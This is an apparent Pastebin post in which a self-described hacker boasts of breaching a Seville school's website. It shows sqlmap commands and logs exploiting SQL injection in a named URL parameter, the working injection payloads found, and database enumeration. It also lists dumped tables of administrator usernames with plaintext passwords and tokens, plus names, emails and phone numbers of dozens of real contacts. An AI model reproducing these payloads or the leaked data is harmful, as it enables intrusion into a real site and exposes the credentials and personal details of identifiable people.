Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- Greeting To Saudi Team :)
- Published by JM511
- From Saudi Arabian
- BBM;21EB3DBB
- ======================
- FUCKED> www.vedrunasevilla.org
- Colegio Santa Joaquina de Vedruna (Sevilla)
- Domicilio Social: C/ Espinosa y Cárcel, 49 Voz: 954 93 20 81 Fax: 954 93 26 14 [email protected]. Web oficial. Colegio Santa Joaquina de ...
- Table: cic_usuarios
- [3 entries]
- +--------+------------+-------+---------------+---------------------------------+---------+
- | activo | id_usuario | idrol | password | token | usuario |
- +--------+------------+-------+---------------+---------------------------------+---------+
- | 1 | 3 | 1 | me@lo@robaron | I1lvawMdRrfyfV61RQOoT6rWLRXNcoA | ebosque |
- | 1 | 1 | 1 | 19117 | I1lvawMdRrfyfV61RQOoT6rWLRXNcoA | jose |
- | 1 | 2 | 1 | mi@carro | I1lvawMdRrfyfV61RQOoT6rWLRXNcoA | migomez |
- +--------+------------+-------+---------------+---------------------------------+---------+
- Database: ciclos1
- Table: cic_contactos
- [38 entries]
- +---------------------------------------+------------+-------------+---------+----------+-----------+-----------------+-------------------------------------+-------------+-----------+-----------+
- | email | fecha_c | id_contacto | idciclo | idestado | idestudio | idvia_respuesta | nombre | observacion | respuesta | tlf_c |
- +---------------------------------------+------------+-------------+---------+----------+-----------+-----------------+-------------------------------------+-------------+-----------+-----------+
- | [email protected] | 2012-09-03 | 375 | 4 | 0 | 1 | 0 | charo | NULL | NULL | 666289058 |
- | [email protected] | 2012-09-05 | 383 | 1 | 0 | 1 | 0 | \c1ngela Boyon Recio | NULL | NULL | NULL |
- | [email protected] | 2012-08-29 | 361 | 5 | 0 | 3 | 0 | Javier | NULL | NULL | 670436616 |
- | [email protected] | 2012-08-27 | 359 | 3 | 0 | 4 | 0 | Macarena Rodr\edguez Silva | NULL | NULL | 687766958 |
- | [email protected] | 2012-09-03 | 372 | 1 | 0 | 1 | 0 | Mar\eda Teresa | NULL | NULL | 637147951 |
- | NULL | 2012-09-07 | 392 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
- | [email protected] | 2012-09-03 | 370 | 4 | 0 | 2 | 0 | cristobal | NULL | NULL | NULL |
- | [email protected] | 2012-08-29 | 362 | 4 | 0 | 1 | 0 | Benito Cruzado V\e9lez | NULL | NULL | 651955060 |
- | [email protected] | 2012-09-04 | 376 | 1 | 0 | 1 | 0 | marina | NULL | NULL | 660119042 |
- | [email protected] | 2012-09-07 | 390 | 1 | 0 | 1 | 0 | BEATRIZ ARIAS | NULL | NULL | 954648924 |
- | [email protected] | 2012-09-02 | 369 | 4 | 0 | 1 | 0 | Jes\fas | NULL | NULL | 659823718 |
- | [email protected] | 2012-08-27 | 358 | 4 | 0 | 1 | 0 | Alejandro Zambrano Cuadrado | NULL | NULL | 640124011 |
- | [email protected] | 2012-09-06 | 385 | 4 | 0 | 2 | 0 | Miguel \c1ngel Fern\e1ndez Garc\eda | NULL | NULL | 655909556 |
- | [email protected] | 2012-08-27 | 357 | 4 | 0 | 1 | 0 | \c1lvaro Acosta Pizarraya | NULL | NULL | 647904873 |
- | [email protected] | 2012-08-29 | 363 | 1 | 0 | 1 | 0 | Antonio David Agraso Lopez | NULL | NULL | 687884815 |
- | [email protected] | 2012-09-05 | 382 | 4 | 0 | 1 | 0 | Mercedes Torres Cansino | NULL | NULL | 651496061 |
- | [email protected] | 2012-09-05 | 384 | 4 | 0 | 1 | 0 | JOSE ANGEL POSTIGO GONZALEZ | NULL | NULL | 696424913 |
- | NULL | 2012-09-01 | 367 | 3 | 0 | 5 | 0 | NULL | NULL | NULL | NULL |
- | [email protected] | 2012-08-27 | 360 | 4 | 0 | 1 | 0 | Antonio David Agraso Lopez | NULL | NULL | 687884815 |
- | [email protected] | 2012-09-07 | 391 | 1 | 0 | 1 | 0 | Beatriz | NULL | NULL | NULL |
- | [email protected] | 2012-09-05 | 381 | 4 | 0 | 2 | 0 | Rafael S\e1nchez P\e9rez | NULL | NULL | 678893038 |
- | [email protected] | 2012-09-01 | 368 | 4 | 0 | 2 | 0 | ANA MARIA TRISTAN | NULL | NULL | 696429972 |
- | [email protected] | 2012-09-07 | 387 | 1 | 0 | 1 | 0 | lucia | NULL | NULL | 675020933 |
- | NULL | 2012-09-04 | 378 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
- | [email protected] | 2012-08-29 | 364 | 4 | 0 | 1 | 0 | Antonio David Agraso Lopez | NULL | NULL | 687884815 |
- | mlmorenozgmail.com | 2012-09-03 | 373 | 1 | 0 | 1 | 0 | Rocio Casares | NULL | NULL | 645527440 |
- | [email protected] | 2012-09-06 | 386 | 1 | 0 | 1 | 0 | Teresa Barcel\f3 | NULL | NULL | 659920862 |
- | [email protected] | 2012-09-04 | 380 | 1 | 0 | 2 | 0 | Raquel | NULL | NULL | 657112930 |
- | NULL | 2012-09-04 | 377 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
- | [email protected] | 2012-09-03 | 374 | 1 | 0 | 1 | 0 | Marina Duque Gomez | NULL | NULL | 606422828 |
- | [email protected] | 2012-09-07 | 388 | 4 | 0 | 1 | 0 | Angel Aguilera Ruiz | NULL | NULL | 954120587 |
- | [email protected] | 2012-09-04 | 379 | 1 | 0 | 1 | 0 | Ana \c1vila Romero | NULL | NULL | 671908165 |
- | [email protected] | 2012-09-07 | 393 | 4 | 0 | 1 | 0 | Antonio P\e9rez Rives | NULL | NULL | 627878392 |
- | [email protected] | 2012-08-30 | 366 | 4 | 0 | 1 | 0 | Manolo Naranjo Fern\e1ndez | NULL | NULL | 675321361 |
- | NULL | 2012-09-03 | 371 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
- | [email protected] | 2012-09-07 | 394 | 5 | 0 | 1 | 0 | Jes\fas Caballero | NULL | NULL | 619209288 |
- | [email protected] | 2012-09-07 | 389 | 4 | 0 | 1 | 0 | Anabel Cabeza Martinez | NULL | NULL | 615293435 |
- | NULL | 2012-08-30 | 365 | 1 | 0 | 1 | 0 | NULL | NULL | NULL | NULL |
- +---------------------------------------+------------+-------------+---------+----------+-----------+-----------------+-------------------------------------+-------------+-----------+-----------+
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://www.vedrunasevilla.org/web_ciclos/web_cic/oferta.php?id_ciclo=1 --dbs
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:17:38
- [22:17:39] [INFO] using '/home/jm511/.sqlmap/output/www.vedrunasevilla.org/session' as session file
- [22:17:39] [INFO] testing connection to the target url
- [22:17:40] [INFO] testing if the url is stable, wait a few seconds
- [22:17:41] [INFO] url is stable
- [22:17:41] [INFO] testing if GET parameter 'id_ciclo' is dynamic
- [22:17:41] [INFO] confirming that GET parameter 'id_ciclo' is dynamic
- [22:17:42] [INFO] GET parameter 'id_ciclo' is dynamic
- [22:17:42] [INFO] heuristic test shows that GET parameter 'id_ciclo' might be injectable (possible DBMS: MySQL)
- [22:17:42] [INFO] testing sql injection on GET parameter 'id_ciclo'
- [22:17:42] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
- [22:17:45] [INFO] GET parameter 'id_ciclo' is 'AND boolean-based blind - WHERE or HAVING clause' injectable
- [22:17:45] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
- [22:17:50] [INFO] GET parameter 'id_ciclo' is 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause' injectable
- [22:17:50] [INFO] testing 'MySQL > 5.0.11 stacked queries'
- [22:17:51] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
- [22:17:56] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
- [22:18:01] [INFO] target url appears to be UNION injectable with 6 columns
- [22:18:02] [INFO] GET parameter 'id_ciclo' is 'MySQL UNION query (NULL) - 1 to 10 columns' injectable
- GET parameter 'id_ciclo' is vulnerable. Do you want to keep testing the others? [y/N] y
- sqlmap identified the following injection points with a total of 20 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id_ciclo
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_ciclo=1 AND 7713=7713
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id_ciclo=1 AND (SELECT 4018 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,102,101,58),(SELECT (CASE WHEN (4018=4018) THEN 1 ELSE 0 END)),CHAR(58,99,108,106,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 to 10 columns
- Payload: id_ciclo=1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,122,102,101,58),IFNULL(CAST(CHAR(80,111,109,110,86,73,102,80,109,103) AS CHAR),CHAR(32)),CHAR(58,99,108,106,58)), NULL, NULL#
- ---
- [22:19:44] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.2.13
- back-end DBMS: MySQL 5.0
- [22:19:44] [INFO] fetching database names
- [22:19:44] [INFO] the SQL query used returns 2 entries
- available databases [2]:
- [*] ciclos1
- [*] information_schema
- [22:19:45] [INFO] Fetched data logged to text files under '/home/jm511/.sqlmap/output/www.vedrunasevilla.org'
- [*] shutting down at: 22:19:45
- jm511@jm511hacker:~$ python /usr/bin/sqlmap -u http://www.vedrunasevilla.org/web_ciclos/web_cic/oferta.php?id_ciclo=1 -D ciclos1 --tables
- sqlmap/0.9 - automatic SQL injection and database takeover tool
- http://sqlmap.sourceforge.net
- [*] starting at: 22:20:09
- [22:20:09] [INFO] using '/home/jm511/.sqlmap/output/www.vedrunasevilla.org/session' as session file
- [22:20:09] [INFO] resuming injection data from session file
- [22:20:09] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
- [22:20:09] [INFO] testing connection to the target url
- sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
- ---
- Place: GET
- Parameter: id_ciclo
- Type: boolean-based blind
- Title: AND boolean-based blind - WHERE or HAVING clause
- Payload: id_ciclo=1 AND 7713=7713
- Type: error-based
- Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
- Payload: id_ciclo=1 AND (SELECT 4018 FROM(SELECT COUNT(*),CONCAT(CHAR(58,122,102,101,58),(SELECT (CASE WHEN (4018=4018) THEN 1 ELSE 0 END)),CHAR(58,99,108,106,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
- Type: UNION query
- Title: MySQL UNION query (NULL) - 1 to 10 columns
- Payload: id_ciclo=1 UNION ALL SELECT NULL, NULL, NULL, CONCAT(CHAR(58,122,102,101,58),IFNULL(CAST(CHAR(80,111,109,110,86,73,102,80,109,103) AS CHAR),CHAR(32)),CHAR(58,99,108,106,58)), NULL, NULL#
- ---
- [22:20:10] [INFO] the back-end DBMS is MySQL
- web application technology: Apache 2.2.13
- back-end DBMS: MySQL 5.0
- [22:20:10] [INFO] fetching tables for database 'ciclos1'
- [22:20:10] [INFO] the SQL query used returns 17 entries
- Database: ciclos1
- [17 tables]
- +--------------------+
- | cic_asignaturas |
- | cic_ciclos |
- | cic_contactos |
- | cic_cursos |
- | cic_enlaces |
- | cic_estados |
- | cic_estudios |
- | cic_extensiones |
- | cic_familias |
- | cic_ficheros |
- | cic_noticias |
- | cic_preguntas |
- | cic_tipos_enl |
- | cic_tipos_noticia |
- | cic_usuarios |
- | cic_via_respuestas |
- | zz_bck_cic_ciclos |
- +--------------------+
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement